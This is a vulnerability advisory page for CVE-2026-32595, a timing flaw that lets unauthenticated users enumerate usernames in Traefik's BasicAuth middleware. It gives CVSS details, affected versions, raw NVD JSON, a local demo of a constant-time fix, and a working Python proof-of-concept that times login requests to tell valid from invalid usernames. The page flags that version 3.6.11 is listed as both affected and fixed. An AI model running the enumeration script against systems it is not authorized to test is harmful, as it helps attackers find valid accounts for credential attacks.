Security Vulnerability Report
CVE-2026-32595 CVSS 3.7 LOW

CVE-2026-32595

Published: 2026-03-20 11:18:03
Last Modified: 2026-03-24 15:14:24

Description

Traefik is an HTTP reverse proxy and load balancer. Versions 2.11.40 and below, 3.0.0-beta1 through 3.6.11, and 3.7.0-ea.1 contain a BasicAuth middleware that allows username enumeration via a timing attack. When a submitted username exists, the middleware performs a bcrypt password comparison taking ~166ms. When the username does not exist, the response returns immediately in ~0.6ms. This ~298x timing difference is observable over the network and allows an unauthenticated attacker to reliably distinguish valid from invalid usernames. The weakness is classified as CWE-208 (Observable Timing Discrepancy). This issue is patched in versions 2.11.41, 3.6.11 and 3.7.0-ea.2.
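The following added example is not part of the advisory or of Traefik's own code. It reproduces the two code paths the description contrasts and shows the usual fix pattern: the vulnerable checker returns early for unknown users, while the hardened checker always performs the expensive hash against a precomputed dummy digest and compares in constant time, so response time no longer depends on whether the username exists. It assumes PBKDF2-HMAC-SHA256 as a stand-in for bcrypt (so it runs on the standard library alone) and a constructed single-user table; the user names, salt and passwords are hypothetical.

```python
import hashlib
import hmac
import statistics
import time

# Stand-in for bcrypt: PBKDF2-HMAC-SHA256 with a high iteration count.
# Assumption for a self-contained demo; Traefik itself uses bcrypt.
ITERATIONS = 100_000


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


# Constructed user table (hypothetical user and password, not from the advisory).
_SALT = b"constructed-demo-salt"
USERS = {"admin": hash_password("s3cret", _SALT)}

# Dummy digest computed once at startup; the hardened path compares against
# it when the username is unknown so that the hash work is always done.
_DUMMY_HASH = hash_password("dummy-password-never-matches", _SALT)


def vulnerable_check(username: str, password: str) -> bool:
    """Mirrors the reported flaw: unknown users short-circuit before hashing."""
    stored = USERS.get(username)
    if stored is None:
        return False  # microseconds: leaks that the user does not exist
    return hmac.compare_digest(hash_password(password, _SALT), stored)


def hardened_check(username: str, password: str) -> bool:
    """Always performs the expensive hash, so timing is independent of existence."""
    stored = USERS.get(username)
    known = stored is not None
    candidate = hash_password(password, _SALT)
    reference = stored if known else _DUMMY_HASH
    matches = hmac.compare_digest(candidate, reference)  # constant-time compare
    return matches and known


def median_seconds(check, username: str, password: str, samples: int = 5) -> float:
    """Median wall-clock time of `check` over several calls (median resists jitter)."""
    times = []
    for _ in range(samples):
        start = time.perf_counter()
        check(username, password)
        times.append(time.perf_counter() - start)
    return statistics.median(times)


def timing_ratio(check) -> float:
    """Median time for a known user divided by median time for an unknown user."""
    known = median_seconds(check, "admin", "wrong-password")
    unknown = median_seconds(check, "nobody", "wrong-password")
    return known / unknown


if __name__ == "__main__":
    print(f"vulnerable ratio: {timing_ratio(vulnerable_check):.0f}x")
    print(f"hardened   ratio: {timing_ratio(hardened_check):.2f}x")
```

On the vulnerable path the known/unknown ratio is in the hundreds or thousands, which is the signal the advisory describes; on the hardened path it stays close to 1. The trade-off is that every request with an unknown username now costs a full password-hash computation, so a rate limit in front of the middleware is still worth having to bound the CPU an unauthenticated client can burn.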

CVSS Details

CVSS Score (v3.1, primary): 3.7
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
CVSS Score (v4.0, secondary): 6.3 MEDIUM
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N
Weakness: CWE-208

Configurations (Affected Products)

cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:* (versions before 2.11.41) - VULNERABLE
cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:* (versions 3.0.0 through 3.6.11 inclusive) - VULNERABLE
cpe:2.3:a:traefik:traefik:3.7.0:ea1:*:*:*:*:*:* - VULNERABLE
Traefik <= 2.11.40
Traefik 3.0.0-beta1 through 3.6.11
Traefik 3.7.0-ea.1

Note that the description lists 3.6.11 both as an affected version and as a fixed version, while the v3.6.11 release notes are cited as the fix. Confirm the exact boundary against the linked advisory before deciding whether a 3.6.11 deployment needs action; versions 2.11.41 and 3.7.0-ea.2 are unambiguously fixed.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import time

import requests


def check_username_timing(url, username, password, samples=5):
    """
    Estimate whether a username exists from response timing.

    Per the advisory, a valid username triggers a bcrypt comparison
    (~166ms) while an invalid one returns immediately (~0.6ms).
    requests' auth tuple handles the base64 encoding of the Basic
    credentials. Returns the median round-trip time in seconds over
    `samples` requests (the median resists network jitter), or -1 on error.
    """
    times = []
    for _ in range(samples):
        start = time.perf_counter()
        try:
            requests.get(url, auth=(username, password), timeout=5)
        except requests.RequestException:
            return -1
        times.append(time.perf_counter() - start)
    times.sort()
    return times[len(times) // 2]


# Example usage against a host you are authorized to test
target = "http://localhost:8080"
users = ["admin", "root", "test"]
for u in users:
    t = check_username_timing(target, u, "testpass")
    print(f"User: {u}, Time: {t:.4f}s")

References

https://github.com/traefik/traefik/releases/tag/v2.11.41 (Release Notes)
https://github.com/traefik/traefik/releases/tag/v3.6.11 (Release Notes)
https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2 (Release Notes)
https://github.com/traefik/traefik/security/advisories/GHSA-g3hg-j4jv-cwfr (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32595", "sourceIdentifier": "[email protected]", "published": "2026-03-20T11:18:02.537", "lastModified": "2026-03-24T15:14:24.170", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Traefik is an HTTP reverse proxy and load balancer. Versions 2.11.40 and below, 3.0.0-beta1 through 3.6.11, and 3.7.0-ea.1 comtain BasicAuth middleware that allows username enumeration via a timing attack. When a submitted username exists, the middleware performs a bcrypt password comparison taking ~166ms. When the username does not exist, the response returns immediately in ~0.6ms. This ~298x timing difference is observable over the network and allows an unauthenticated attacker to reliably distinguish valid from invalid usernames. This issue is patched in versions 2.11.41, 3.6.11 and 3.7.0-ea.2."}, {"lang": "es", "value": "Traefik es un proxy inverso HTTP y un balanceador de carga. Las versiones 2.11.40 e inferiores, 3.0.0-beta1 hasta 3.6.11, y 3.7.0-ea.1 contienen un middleware BasicAuth que permite la enumeración de nombres de usuario mediante un ataque de temporización. Cuando un nombre de usuario enviado existe, el middleware realiza una comparación de contraseñas bcrypt que tarda aproximadamente 166 ms. Cuando el nombre de usuario no existe, la respuesta se devuelve inmediatamente en aproximadamente 0.6 ms. Esta diferencia de temporización de aproximadamente 298x es observable a través de la red y permite a un atacante no autenticado distinguir de forma fiable los nombres de usuario válidos de los no válidos. 
Este problema está parcheado en las versiones 2.11.41, 3.6.11 y 3.7.0-ea.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": 
"LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-208"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.11.41", "matchCriteriaId": "440A1D58-1FFD-408A-A6B0-25E23F5C24AF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndIncluding": "3.6.11", "matchCriteriaId": "90620FAD-4F72-465E-A744-D62559C92F18"}, {"vulnerable": true, "criteria": "cpe:2.3:a:traefik:traefik:3.7.0:ea1:*:*:*:*:*:*", "matchCriteriaId": "7881B288-5141-4508-AB71-3F7586168437"}]}]}], "references": [{"url": "https://github.com/traefik/traefik/releases/tag/v2.11.41", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/traefik/traefik/releases/tag/v3.6.11", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/traefik/traefik/security/advisories/GHSA-g3hg-j4jv-cwfr", "source": "security-advi ... (truncated)